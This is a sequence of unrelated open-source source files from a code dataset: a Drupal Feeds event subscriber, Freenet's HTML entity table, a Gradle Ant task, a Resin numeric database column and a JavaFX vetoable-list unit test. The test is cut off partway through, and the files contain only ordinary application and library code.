}
}
| mdaniel/svn-caucho-com-resin | modules/resin/src/com/caucho/db/jdbc/GeneratedKeysResultSet.java | Java | gpl-2.0 | 12,600 |
<?php
namespace Drupal\feeds\EventSubscriber;
use Drupal\feeds\Event\ClearEvent;
use Drupal\feeds\Event\ExpireEvent;
use Drupal\feeds\Event\FeedsEvents;
use Drupal\feeds\Event\FetchEvent;
use Drupal\feeds\Event\InitEvent;
use Drupal\feeds\Event\ParseEvent;
use Drupal\feeds\Event\ProcessEvent;
use Drupal\feeds\Plugin\Type\ClearableInterface;
use Drupal\feeds\StateInterface;
use Symfony\Component\EventDispatcher\EventDispatcherInterface;
use Symfony\Component\EventDispatcher\EventSubscriberInterface;
/**
 * Event listener that registers Feeds plugins as event listeners.
 *
 * The plugin listeners are registered lazily: only when the corresponding
 * INIT_* event fires for the first time, and at most once per process.
 */
class LazySubscriber implements EventSubscriberInterface {

  /**
   * Whether the import listeners have been added, keyed by import stage.
   *
   * @var array
   */
  protected $importInited = [];

  /**
   * Whether the clear listeners have been added.
   *
   * @var bool
   */
  protected $clearInited = FALSE;

  /**
   * Whether the expire listeners have been added.
   *
   * @var bool
   */
  protected $expireInited = FALSE;

  /**
   * {@inheritdoc}
   */
  public static function getSubscribedEvents() {
    $events = [];
    $events[FeedsEvents::INIT_IMPORT][] = 'onInitImport';
    $events[FeedsEvents::INIT_CLEAR][] = 'onInitClear';
    $events[FeedsEvents::INIT_EXPIRE][] = 'onInitExpire';
    return $events;
  }

  /**
   * Adds import plugins as event listeners.
   *
   * Registers the feed type's fetcher, parser or processor as a listener
   * for the matching import-stage event, the first time that stage is
   * initialized.
   */
  public function onInitImport(InitEvent $event, $event_name, EventDispatcherInterface $dispatcher) {
    $stage = $event->getStage();

    // Register the listener for each stage at most once.
    if (isset($this->importInited[$stage])) {
      return;
    }
    $this->importInited[$stage] = TRUE;

    switch ($stage) {
      case 'fetch':
        $dispatcher->addListener(FeedsEvents::FETCH, function(FetchEvent $event) {
          $feed = $event->getFeed();
          $result = $feed->getType()->getFetcher()->fetch($feed, $feed->getState(StateInterface::FETCH));
          $event->setFetcherResult($result);
        });
        break;

      case 'parse':
        $dispatcher->addListener(FeedsEvents::PARSE, function(ParseEvent $event) {
          $feed = $event->getFeed();

          $result = $feed
            ->getType()
            ->getParser()
            ->parse($feed, $event->getFetcherResult(), $feed->getState(StateInterface::PARSE));
          $event->setParserResult($result);
        });
        break;

      case 'process':
        $dispatcher->addListener(FeedsEvents::PROCESS, function(ProcessEvent $event) {
          $feed = $event->getFeed();
          $feed
            ->getType()
            ->getProcessor()
            ->process($feed, $event->getParserResult(), $feed->getState(StateInterface::PROCESS));
        });
        break;
    }
  }

  /**
   * Adds clear plugins as event listeners.
   *
   * Every plugin of the feed type that implements ClearableInterface is
   * registered as a CLEAR listener. Runs at most once per process.
   */
  public function onInitClear(InitEvent $event, $event_name, EventDispatcherInterface $dispatcher) {
    if ($this->clearInited === TRUE) {
      return;
    }
    $this->clearInited = TRUE;

    foreach ($event->getFeed()->getType()->getPlugins() as $plugin) {
      if (!$plugin instanceof ClearableInterface) {
        continue;
      }

      $dispatcher->addListener(FeedsEvents::CLEAR, function(ClearEvent $event) use ($plugin) {
        $feed = $event->getFeed();
        $plugin->clear($feed, $feed->getState(StateInterface::CLEAR));
      });
    }
  }

  /**
   * Adds expire plugins as event listeners.
   *
   * Registers the feed type's processor as the EXPIRE listener. Runs at
   * most once per process.
   */
  public function onInitExpire(InitEvent $event, $event_name, EventDispatcherInterface $dispatcher) {
    if ($this->expireInited === TRUE) {
      return;
    }
    $this->expireInited = TRUE;

    $dispatcher->addListener(FeedsEvents::EXPIRE, function(ExpireEvent $event) {
      $feed = $event->getFeed();
      $state = $feed->getState(StateInterface::EXPIRE);

      $feed->getType()
        ->getProcessor()
        ->expireItem($feed, $event->getItemId(), $state);

      $feed->saveStates();
    });
  }

}
| marceliotstein/marcelio8 | web/modules/feeds/src/EventSubscriber/LazySubscriber.php | PHP | gpl-2.0 | 3,856 |
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/
package freenet.support;
import java.util.HashMap;
/**
* Class that provides data structures filled with HTML Entities and correspondent char value
*
* @author Alberto Bacchelli <sback@freenetproject.org>
*/
public final class HTMLEntities {
/**
* a Map where the HTML Entity is the value and the correspondent char is the key
*/
public static final HashMap<Character, String> encodeMap;
/**
* a Map where the HTML Entity is the key and the correspondent char is the value
*/
public static final HashMap<String, Character> decodeMap;
private static final Object[][] charArray = {
{Character.valueOf((char)0), "#0"},
{Character.valueOf((char)34), "quot"},
{Character.valueOf((char)38), "amp"},
{Character.valueOf((char)39), "#39"},
{Character.valueOf((char)60), "lt"},
{Character.valueOf((char)62), "gt"},
{Character.valueOf((char)160), "nbsp"},
{Character.valueOf((char)161), "iexcl"},
{Character.valueOf((char)162), "cent"},
{Character.valueOf((char)163), "pound"},
{Character.valueOf((char)164), "curren"},
{Character.valueOf((char)165), "yen"},
{Character.valueOf((char)166), "brvbar"},
{Character.valueOf((char)167), "sect"},
{Character.valueOf((char)168), "uml"},
{Character.valueOf((char)169), "copy"},
{Character.valueOf((char)170), "ordf"},
{Character.valueOf((char)171), "laquo"},
{Character.valueOf((char)172), "not"},
{Character.valueOf((char)173), "shy"},
{Character.valueOf((char)174), "reg"},
{Character.valueOf((char)175), "macr"},
{Character.valueOf((char)176), "deg"},
{Character.valueOf((char)177), "plusmn"},
{Character.valueOf((char)178), "sup2"},
{Character.valueOf((char)179), "sup3"},
{Character.valueOf((char)180), "acute"},
{Character.valueOf((char)181), "micro"},
{Character.valueOf((char)182), "para"},
{Character.valueOf((char)183), "middot"},
{Character.valueOf((char)184), "cedil"},
{Character.valueOf((char)185), "sup1"},
{Character.valueOf((char)186), "ordm"},
{Character.valueOf((char)187), "raquo"},
{Character.valueOf((char)188), "frac14"},
{Character.valueOf((char)189), "frac12"},
{Character.valueOf((char)190), "frac34"},
{Character.valueOf((char)191), "iquest"},
{Character.valueOf((char)192), "Agrave"},
{Character.valueOf((char)193), "Aacute"},
{Character.valueOf((char)194), "Acirc"},
{Character.valueOf((char)195), "Atilde"},
{Character.valueOf((char)196), "Auml"},
{Character.valueOf((char)197), "Aring"},
{Character.valueOf((char)198), "AElig"},
{Character.valueOf((char)199), "Ccedil"},
{Character.valueOf((char)200), "Egrave"},
{Character.valueOf((char)201), "Eacute"},
{Character.valueOf((char)202), "Ecirc"},
{Character.valueOf((char)203), "Euml"},
{Character.valueOf((char)204), "Igrave"},
{Character.valueOf((char)205), "Iacute"},
{Character.valueOf((char)206), "Icirc"},
{Character.valueOf((char)207), "Iuml"},
{Character.valueOf((char)208), "ETH"},
{Character.valueOf((char)209), "Ntilde"},
{Character.valueOf((char)210), "Ograve"},
{Character.valueOf((char)211), "Oacute"},
{Character.valueOf((char)212), "Ocirc"},
{Character.valueOf((char)213), "Otilde"},
{Character.valueOf((char)214), "Ouml"},
{Character.valueOf((char)215), "times"},
{Character.valueOf((char)216), "Oslash"},
{Character.valueOf((char)217), "Ugrave"},
{Character.valueOf((char)218), "Uacute"},
{Character.valueOf((char)219), "Ucirc"},
{Character.valueOf((char)220), "Uuml"},
{Character.valueOf((char)221), "Yacute"},
{Character.valueOf((char)222), "THORN"},
{Character.valueOf((char)223), "szlig"},
{Character.valueOf((char)224), "agrave"},
{Character.valueOf((char)225), "aacute"},
{Character.valueOf((char)226), "acirc"},
{Character.valueOf((char)227), "atilde"},
{Character.valueOf((char)228), "auml"},
{Character.valueOf((char)229), "aring"},
{Character.valueOf((char)230), "aelig"},
{Character.valueOf((char)231), "ccedil"},
{Character.valueOf((char)232), "egrave"},
{Character.valueOf((char)233), "eacute"},
{Character.valueOf((char)234), "ecirc"},
{Character.valueOf((char)235), "euml"},
{Character.valueOf((char)236), "igrave"},
{Character.valueOf((char)237), "iacute"},
{Character.valueOf((char)238), "icirc"},
{Character.valueOf((char)239), "iuml"},
{Character.valueOf((char)240), "eth"},
{Character.valueOf((char)241), "ntilde"},
{Character.valueOf((char)242), "ograve"},
{Character.valueOf((char)243), "oacute"},
{Character.valueOf((char)244), "ocirc"},
{Character.valueOf((char)245), "otilde"},
{Character.valueOf((char)246), "ouml"},
{Character.valueOf((char)247), "divide"},
{Character.valueOf((char)248), "oslash"},
{Character.valueOf((char)249), "ugrave"},
{Character.valueOf((char)250), "uacute"},
{Character.valueOf((char)251), "ucirc"},
{Character.valueOf((char)252), "uuml"},
{Character.valueOf((char)253), "yacute"},
{Character.valueOf((char)254), "thorn"},
{Character.valueOf((char)255), "yuml"},
{Character.valueOf((char)260), "#260"},
{Character.valueOf((char)261), "#261"},
{Character.valueOf((char)262), "#262"},
{Character.valueOf((char)263), "#263"},
{Character.valueOf((char)280), "#280"},
{Character.valueOf((char)281), "#281"},
{Character.valueOf((char)321), "#321"},
{Character.valueOf((char)322), "#322"},
{Character.valueOf((char)323), "#323"},
{Character.valueOf((char)324), "#324"},
{Character.valueOf((char)338), "OElig"},
{Character.valueOf((char)339), "oelig"},
{Character.valueOf((char)346), "#346"},
{Character.valueOf((char)347), "#347"},
{Character.valueOf((char)352), "Scaron"},
{Character.valueOf((char)353), "scaron"},
{Character.valueOf((char)376), "Yuml"},
{Character.valueOf((char)377), "#377"},
{Character.valueOf((char)378), "#378"},
{Character.valueOf((char)379), "#379"},
{Character.valueOf((char)380), "#380"},
{Character.valueOf((char)402), "fnof"},
{Character.valueOf((char)710), "circ"},
{Character.valueOf((char)732), "tilde"},
{Character.valueOf((char)913), "Alpha"},
{Character.valueOf((char)914), "Beta"},
{Character.valueOf((char)915), "Gamma"},
{Character.valueOf((char)916), "Delta"},
{Character.valueOf((char)917), "Epsilon"},
{Character.valueOf((char)918), "Zeta"},
{Character.valueOf((char)919), "Eta"},
{Character.valueOf((char)920), "Theta"},
{Character.valueOf((char)921), "Iota"},
{Character.valueOf((char)922), "Kappa"},
{Character.valueOf((char)923), "Lambda"},
{Character.valueOf((char)924), "Mu"},
{Character.valueOf((char)925), "Nu"},
{Character.valueOf((char)926), "Xi"},
{Character.valueOf((char)927), "Omicron"},
{Character.valueOf((char)928), "Pi"},
{Character.valueOf((char)929), "Rho"},
{Character.valueOf((char)931), "Sigma"},
{Character.valueOf((char)932), "Tau"},
{Character.valueOf((char)933), "Upsilon"},
{Character.valueOf((char)934), "Phi"},
{Character.valueOf((char)935), "Chi"},
{Character.valueOf((char)936), "Psi"},
{Character.valueOf((char)937), "Omega"},
{Character.valueOf((char)945), "alpha"},
{Character.valueOf((char)946), "beta"},
{Character.valueOf((char)947), "gamma"},
{Character.valueOf((char)948), "delta"},
{Character.valueOf((char)949), "epsilon"},
{Character.valueOf((char)950), "zeta"},
{Character.valueOf((char)951), "eta"},
{Character.valueOf((char)952), "theta"},
{Character.valueOf((char)953), "iota"},
{Character.valueOf((char)954), "kappa"},
{Character.valueOf((char)955), "lambda"},
{Character.valueOf((char)956), "mu"},
{Character.valueOf((char)957), "nu"},
{Character.valueOf((char)958), "xi"},
{Character.valueOf((char)959), "omicron"},
{Character.valueOf((char)960), "pi"},
{Character.valueOf((char)961), "rho"},
{Character.valueOf((char)962), "sigmaf"},
{Character.valueOf((char)963), "sigma"},
{Character.valueOf((char)964), "tau"},
{Character.valueOf((char)965), "upsilon"},
{Character.valueOf((char)966), "phi"},
{Character.valueOf((char)967), "chi"},
{Character.valueOf((char)968), "psi"},
{Character.valueOf((char)969), "omega"},
{Character.valueOf((char)977), "thetasym"},
{Character.valueOf((char)978), "upsih"},
{Character.valueOf((char)982), "piv"},
{Character.valueOf((char)8194), "ensp"},
{Character.valueOf((char)8195), "emsp"},
{Character.valueOf((char)8201), "thinsp"},
{Character.valueOf((char)8204), "zwnj"},
{Character.valueOf((char)8205), "zwj"},
{Character.valueOf((char)8206), "lrm"},
{Character.valueOf((char)8207), "rlm"},
{Character.valueOf((char)8211), "ndash"},
{Character.valueOf((char)8212), "mdash"},
{Character.valueOf((char)8216), "lsquo"},
{Character.valueOf((char)8217), "rsquo"},
{Character.valueOf((char)8218), "sbquo"},
{Character.valueOf((char)8220), "ldquo"},
{Character.valueOf((char)8221), "rdquo"},
{Character.valueOf((char)8222), "bdquo"},
{Character.valueOf((char)8224), "dagger"},
{Character.valueOf((char)8225), "Dagger"},
{Character.valueOf((char)8226), "bull"},
{Character.valueOf((char)8230), "hellip"},
{Character.valueOf((char)8240), "permil"},
{Character.valueOf((char)8242), "prime"},
{Character.valueOf((char)8243), "Prime"},
{Character.valueOf((char)8249), "lsaquo"},
{Character.valueOf((char)8250), "rsaquo"},
{Character.valueOf((char)8254), "oline"},
{Character.valueOf((char)8260), "frasl"},
{Character.valueOf((char)8364), "euro"},
{Character.valueOf((char)8465), "image"},
{Character.valueOf((char)8472), "weierp"},
{Character.valueOf((char)8476), "real"},
{Character.valueOf((char)8482), "trade"},
{Character.valueOf((char)8501), "alefsym"},
{Character.valueOf((char)8592), "larr"},
{Character.valueOf((char)8593), "uarr"},
{Character.valueOf((char)8594), "rarr"},
{Character.valueOf((char)8595), "darr"},
{Character.valueOf((char)8596), "harr"},
{Character.valueOf((char)8629), "crarr"},
{Character.valueOf((char)8656), "lArr"},
{Character.valueOf((char)8657), "uArr"},
{Character.valueOf((char)8658), "rArr"},
{Character.valueOf((char)8659), "dArr"},
{Character.valueOf((char)8660), "hArr"},
{Character.valueOf((char)8704), "forall"},
{Character.valueOf((char)8706), "part"},
{Character.valueOf((char)8707), "exist"},
{Character.valueOf((char)8709), "empty"},
{Character.valueOf((char)8711), "nabla"},
{Character.valueOf((char)8712), "isin"},
{Character.valueOf((char)8713), "notin"},
{Character.valueOf((char)8715), "ni"},
{Character.valueOf((char)8719), "prod"},
{Character.valueOf((char)8721), "sum"},
{Character.valueOf((char)8722), "minus"},
{Character.valueOf((char)8727), "lowast"},
{Character.valueOf((char)8730), "radic"},
{Character.valueOf((char)8733), "prop"},
{Character.valueOf((char)8734), "infin"},
{Character.valueOf((char)8736), "ang"},
{Character.valueOf((char)8743), "and"},
{Character.valueOf((char)8744), "or"},
{Character.valueOf((char)8745), "cap"},
{Character.valueOf((char)8746), "cup"},
{Character.valueOf((char)8747), "int"},
{Character.valueOf((char)8756), "there4"},
{Character.valueOf((char)8764), "sim"},
{Character.valueOf((char)8773), "cong"},
{Character.valueOf((char)8776), "asymp"},
{Character.valueOf((char)8800), "ne"},
{Character.valueOf((char)8801), "equiv"},
{Character.valueOf((char)8804), "le"},
{Character.valueOf((char)8805), "ge"},
{Character.valueOf((char)8834), "sub"},
{Character.valueOf((char)8835), "sup"},
{Character.valueOf((char)8836), "nsub"},
{Character.valueOf((char)8838), "sube"},
{Character.valueOf((char)8839), "supe"},
{Character.valueOf((char)8853), "oplus"},
{Character.valueOf((char)8855), "otimes"},
{Character.valueOf((char)8869), "perp"},
{Character.valueOf((char)8901), "sdot"},
{Character.valueOf((char)8968), "lceil"},
{Character.valueOf((char)8969), "rceil"},
{Character.valueOf((char)8970), "lfloor"},
{Character.valueOf((char)8971), "rfloor"},
{Character.valueOf((char)9001), "lang"},
{Character.valueOf((char)9002), "rang"},
{Character.valueOf((char)9674), "loz"},
{Character.valueOf((char)9824), "spades"},
{Character.valueOf((char)9827), "clubs"},
{Character.valueOf((char)9829), "hearts"},
{Character.valueOf((char)9830), "diams"}
};
static {
    // Pre-size the maps for the ~250 entries in charArray; the default
    // HashMap capacity (16) would force several rehashes during class
    // initialization.
    encodeMap = new HashMap<Character, String>(2 * charArray.length);
    decodeMap = new HashMap<String, Character>(2 * charArray.length);

    // Each table row is {Character codepoint, String entityName}; build
    // both lookup directions from the same row.
    for (Object[] entry : charArray) {
        encodeMap.put((Character) entry[0], (String) entry[1]);
        decodeMap.put((String) entry[1], (Character) entry[0]);
    }
}
}
| saces/fred | src/freenet/support/HTMLEntities.java | Java | gpl-2.0 | 13,226 |
/*
* Copyright 2009 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.gradle.api.tasks.ant;
import org.apache.tools.ant.Target;
import org.gradle.api.internal.ConventionTask;
import org.gradle.api.tasks.TaskAction;
import java.io.File;
/**
 * A task which executes an Ant target.
 */
public class AntTarget extends ConventionTask {
    private Target target;
    private File baseDir;

    /**
     * Runs the configured Ant target, temporarily switching the Ant
     * project's base directory to {@link #getBaseDir()} and restoring the
     * previous one afterwards, even when the target fails.
     */
    @TaskAction
    protected void executeAntTarget() {
        File previousBaseDir = target.getProject().getBaseDir();
        target.getProject().setBaseDir(baseDir);
        try {
            target.performTasks();
        } finally {
            target.getProject().setBaseDir(previousBaseDir);
        }
    }

    /**
     * Returns the Ant target to execute.
     */
    public Target getTarget() {
        return target;
    }

    /**
     * Sets the Ant target to execute.
     */
    public void setTarget(Target target) {
        this.target = target;
    }

    /**
     * Returns the Ant project base directory to use when executing the target.
     */
    public File getBaseDir() {
        return baseDir;
    }

    /**
     * Sets the Ant project base directory to use when executing the target.
     */
    public void setBaseDir(File baseDir) {
        this.baseDir = baseDir;
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public String getDescription() {
        if (target == null) {
            return null;
        }
        return target.getDescription();
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public void setDescription(String description) {
        if (target == null) {
            return;
        }
        target.setDescription(description);
    }
}
| cams7/gradle-samples | plugin/core/src/main/groovy/org/gradle/api/tasks/ant/AntTarget.java | Java | gpl-2.0 | 2,203 |
/*
* Copyright (c) 1998-2012 Caucho Technology -- all rights reserved
*
* This file is part of Resin(R) Open Source
*
* Each copy or derived work must preserve the copyright notice and this
* notice unmodified.
*
* Resin Open Source is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* Resin Open Source is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE, or any warranty
* of NON-INFRINGEMENT. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License
* along with Resin Open Source; if not, write to the
* Free SoftwareFoundation, Inc.
* 59 Temple Place, Suite 330
* Boston, MA 02111-1307 USA
*
* @author Scott Ferguson
*/
package com.caucho.db.table;
import com.caucho.db.index.BTree;
import com.caucho.db.sql.Expr;
import com.caucho.db.sql.QueryContext;
import com.caucho.db.sql.SelectResult;
import com.caucho.db.xa.DbTransaction;
import com.caucho.util.CharBuffer;
import java.sql.SQLException;
/**
* Represents a numeric column.
*/
class NumericColumn extends Column {
private int _precision;
private int _scale;
private long _offset;
/**
 * Creates a numeric (fixed-point decimal) column.
 *
 * @param row the row the column is being added to
 * @param name the column's name
 * @param precision the total number of decimal digits
 * @param scale the number of digits after the decimal point
 */
NumericColumn(Row row, String name, int precision, int scale)
{
    super(row, name);

    _precision = precision;
    _scale = scale;

    // Scaling factor 10^scale: values are stored as value * _offset.
    _offset = 1;
    for (int i = 0; i < scale; i++)
        _offset *= 10;
}
/**
* Returns the column's type code.
*/
@Override
public ColumnType getTypeCode()
{
return ColumnType.NUMERIC;
}
/**
* Returns the precision.
*/
public int getPrecision()
{
return _precision;
}
/**
* Returns the scale.
*/
public int getScale()
{
return _scale;
}
/**
* Returns the column's Java type.
*/
@Override
public Class<?> getJavaType()
{
return double.class;
}
/**
* Returns the column's declaration size.
*/
@Override
public int getDeclarationSize()
{
return 8;
}
/**
* Returns the column's length
*/
@Override
public int getLength()
{
return 8;
}
/**
* Sets a string value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
@Override
void setString(DbTransaction xa, byte []block, int rowOffset, String str)
throws SQLException
{
if (str == null || str.length() == 0)
setNull(block, rowOffset);
else
setDouble(xa, block, rowOffset, Double.parseDouble(str));
}
/**
 * Gets a string value from the column.
 *
 * Formats the stored fixed-point value as "&lt;integer&gt;.&lt;fraction&gt;",
 * zero-padding the fraction to the column's scale.
 *
 * @param block the block's buffer
 * @param rowOffset the offset of the row in the block
 *
 * @return the decimal string, or null when the column is SQL NULL
 */
@Override
public String getString(long blockId, byte []block, int rowOffset)
    throws SQLException
{
    if (isNull(block, rowOffset))
        return null;

    long value = getNumeric(block, rowOffset);

    CharBuffer cb = new CharBuffer();

    // Emit the sign separately so head/tail below are non-negative;
    // previously a negative value printed as e.g. "-1.-5".
    if (value < 0) {
        cb.append('-');
        value = -value;
    }

    long head = value / _offset;
    long tail = value % _offset;

    cb.append(head);
    cb.append('.');

    // Zero-pad the fraction to the column scale; previously 1.05 with
    // scale 2 (stored as 105) printed as "1.5".
    for (long place = _offset / 10; place > 1 && tail < place; place /= 10)
        cb.append('0');

    cb.append(tail);

    return cb.toString();
}
/**
* Sets a double value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
@Override
public void setDouble(DbTransaction xa, byte []block, int rowOffset, double v)
throws SQLException
{
setNumeric(xa, block, rowOffset, (long) (v * _offset + 0.5));
}
/**
* Sets a double value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
@Override
public double getDouble(long blockId, byte []block, int rowOffset)
throws SQLException
{
return (double) getNumeric(block, rowOffset) / _offset;
}
/**
* Evaluates the column to a stream.
*/
@Override
public void evalToResult(long blockId, byte []block, int rowOffset,
SelectResult result)
throws SQLException
{
if (isNull(block, rowOffset)) {
result.writeNull();
return;
}
result.writeString(getString(blockId, block, rowOffset));
}
/**
* Evaluate to a buffer.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param buffer the result buffer
* @param buffer the result buffer offset
*
* @return the length of the value
*/
@Override
int evalToBuffer(byte []block, int rowOffset,
byte []buffer, int bufferOffset)
throws SQLException
{
if (isNull(block, rowOffset))
return 0;
int startOffset = rowOffset + _columnOffset;
int len = 8;
System.arraycopy(block, startOffset, buffer, bufferOffset, len);
return len;
}
/**
* Sets the column based on an expression.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param expr the expression to store
*/
@Override
void setExpr(DbTransaction xa,
byte []block, int rowOffset,
Expr expr, QueryContext context)
throws SQLException
{
if (expr.isNull(null))
setNull(block, rowOffset);
else
setDouble(xa, block, rowOffset, expr.evalDouble(context));
}
/**
* Returns true if the items in the given rows match.
*/
@Override
public boolean isEqual(byte []block1, int rowOffset1,
byte []block2, int rowOffset2)
{
if (isNull(block1, rowOffset1) != isNull(block2, rowOffset2))
return false;
int startOffset1 = rowOffset1 + _columnOffset;
int startOffset2 = rowOffset2 + _columnOffset;
return (block1[startOffset1 + 0] == block2[startOffset2 + 0] &&
block1[startOffset1 + 1] == block2[startOffset2 + 1] &&
block1[startOffset1 + 2] == block2[startOffset2 + 2] &&
block1[startOffset1 + 3] == block2[startOffset2 + 3] &&
block1[startOffset1 + 4] == block2[startOffset2 + 4] &&
block1[startOffset1 + 5] == block2[startOffset2 + 5] &&
block1[startOffset1 + 6] == block2[startOffset2 + 6] &&
block1[startOffset1 + 7] == block2[startOffset2 + 7]);
}
/**
* Sets any index for the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param rowAddr the address of the row
*/
@Override
void setIndex(DbTransaction xa,
byte []block, int rowOffset,
long rowAddr, QueryContext context)
throws SQLException
{
BTree index = getIndex();
if (index == null)
return;
index.insert(block, rowOffset + _columnOffset, 8, rowAddr, false);
}
/**
* Sets based on an iterator.
*/
public void set(TableIterator iter, Expr expr, QueryContext context)
throws SQLException
{
iter.setDirty();
setDouble(iter.getTransaction(), iter.getBuffer(), iter.getRowOffset(),
expr.evalDouble(context));
}
/**
* Deleting the row, based on the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param expr the expression to store
*/
@Override
void deleteIndex(DbTransaction xa, byte []block, int rowOffset)
throws SQLException
{
BTree index = getIndex();
if (index != null)
index.remove(block, rowOffset + _columnOffset, 8);
}
/**
* Sets a numeric value in the column.
*
* @param block the block's buffer
* @param rowOffset the offset of the row in the block
* @param value the value to store
*/
void setNumeric(DbTransaction xa, byte []block, int rowOffset, long value)
{
int offset = rowOffset + _columnOffset;
block[offset++] = (byte) (value >> 56);
block[offset++] = (byte) (value >> 48);
block[offset++] = (byte) (value >> 40);
block[offset++] = (byte) (value >> 32);
block[offset++] = (byte) (value >> 24);
block[offset++] = (byte) (value >> 16);
block[offset++] = (byte) (value >> 8);
block[offset++] = (byte) (value);
setNonNull(block, rowOffset);
}
/**
 * Gets a long value from the column.
 *
 * Decodes the 8-byte big-endian scaled integer stored at the column's
 * offset within the row.
 *
 * @param block the block's buffer
 * @param rowOffset the offset of the row in the block
 *
 * @return the scaled value, or 0 when the column is SQL NULL
 */
long getNumeric(byte []block, int rowOffset)
{
    if (isNull(block, rowOffset))
        return 0;

    int offset = rowOffset + _columnOffset;
    long value = 0;

    // Big-endian: most significant byte first (mirrors setNumeric).
    value = (block[offset++] & 0xffL) << 56;
    value |= (block[offset++] & 0xffL) << 48;
    value |= (block[offset++] & 0xffL) << 40;
    value |= (block[offset++] & 0xffL) << 32;
    value |= (block[offset++] & 0xffL) << 24;
    value |= (block[offset++] & 0xffL) << 16;
    value |= (block[offset++] & 0xffL) << 8;
    value |= (block[offset++] & 0xffL);

    return value;
}
}
| WelcomeHUME/svn-caucho-com-resin | modules/resin/src/com/caucho/db/table/NumericColumn.java | Java | gpl-2.0 | 9,344 |
/*
* Copyright (c) 2011, 2014, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package javafx.collections;
import com.sun.javafx.collections.VetoableListDecorator;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.ConcurrentModificationException;
import java.util.Iterator;
import java.util.List;
import java.util.ListIterator;
import org.junit.Before;
import org.junit.Ignore;
import org.junit.Test;
import static org.junit.Assert.*;
/**
*
*/
public class VetoableObservableListTest {
// Records one onProposedChange() notification: the elements proposed for
// addition and the index pairs describing the proposed removals.
private static class Call {
    public Call(List<String> added, int[] removed) {
        this.added = added;
        this.removed = removed;
    }
    int[] removed;
    List<String> added;
}
ObservableList<String> list;
List<Call> calls;
// Asserts that onProposedChange was invoked exactly `count` times.
private void assertCallCount(int count) {
    assertEquals(count, calls.size());
}

// Asserts the added elements and removed index pairs recorded by the
// notification at position `number`.
private void assertCall(int number, String[] added, int[] removed) {
    Call c = calls.get(number);
    assertArrayEquals(removed, c.removed);
    assertArrayEquals(added, c.added.toArray(new String[0]));
}

// Asserts there was exactly one notification, with the given content.
private void assertSingleCall(String[] added, int[] removed) {
    assertCallCount(1);
    assertCall(0, added, removed);
}
@Before
public void setUp() {
    calls = new ArrayList<Call>();
    // Decorator that records every proposed change instead of vetoing it.
    list = new VetoableListDecorator<String>(FXCollections.<String>observableArrayList()) {
        @Override
        protected void onProposedChange(List<String> added, int[] removed) {
            calls.add(new Call(added, removed));
        }
    };
    list.addAll("foo", "bar", "ham", "eggs");
    // Discard the notifications produced by the fixture setup itself.
    calls.clear();
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_add() {
list.add(null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_add_indexed() {
list.add( 1, null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_addAll_collection() {
list.addAll(Arrays.asList("a", null, "b"));
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_addAll() {
list.addAll("a", null, "b");
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_addAll_collection_indexed() {
list.addAll(1, Arrays.asList("a", null, "b"));
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_set() {
list.set(1, null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_setAll() {
list.setAll("a", null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_setAll_collection() {
list.setAll(Arrays.asList("a", null, "b"));
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_listIterator_add() {
list.listIterator().add(null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_listIterator_set() {
ListIterator<String> it = list.listIterator();
it.next();
it.set(null);
}
@Test(expected=NullPointerException.class)
@Ignore
public void testNull_subList_add() {
